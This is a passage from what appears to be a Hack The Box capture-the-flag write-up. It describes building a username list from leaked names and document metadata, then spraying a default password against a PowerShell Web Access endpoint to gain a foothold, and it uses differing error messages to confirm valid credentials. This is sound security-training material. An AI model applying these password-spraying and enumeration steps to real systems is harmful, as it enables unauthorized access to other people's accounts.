Exploitation
The following information is found during the web enumeration earlier;
- The web application disclosed several names that could be potential users
- A Word document file ,
New_Starter_CheckList_v7.docx, revealed;- endpoint for PWSA;
/Acute_Staff_Access - default password for new users;
Password1! - Metadata contains;
- potential naming convention
- host;
Acute-PC01 - user;
Daniel
- endpoint for PWSA;
With the several names, naming convention, and default password revealed, it would be possible to create a list of potential users to attempt to authenticate to the PSWA endpoint
Naming Convention
The naming convention appears to be the first letter of firstname and followed by lastname I will create a list of potentially usernames following the aforementioned format above.
┌──(kali㉿kali)-[~/archive/htb/labs/acute]
└─$ cat users
edavies
imonks
jmorgan
awallace
lhopkins
chall
fcastle
danieldaniel is added as is
Authentication
The default password belongs to the edavies user on the Acute-PC01 host
Initial Foothold established to the Acute-PC01 host as the edavies user via PSWA
Judging by the IP address, the Acute-PC01 host might be a Docker container
Error Messages
While performing a manual brute-force attack, I found something interesting
The error message for incorrect credential is very clear with the following; Sign-in failed. Verify that you have entered your credentials correctly.
However, I get a different error message when attempting to authenticate with the default password for the chall user; An authorization failure occurred. Verify that you are authorized to connect to the destination computer.
That is not the standard authentication error and it’s about authorization.
Looking further into the error message on the official Microsoft documentation reveals a list of potential causes
This may indicate that the credential itself might be correct, however the chall user is not authorized to authenticate to the WinRM service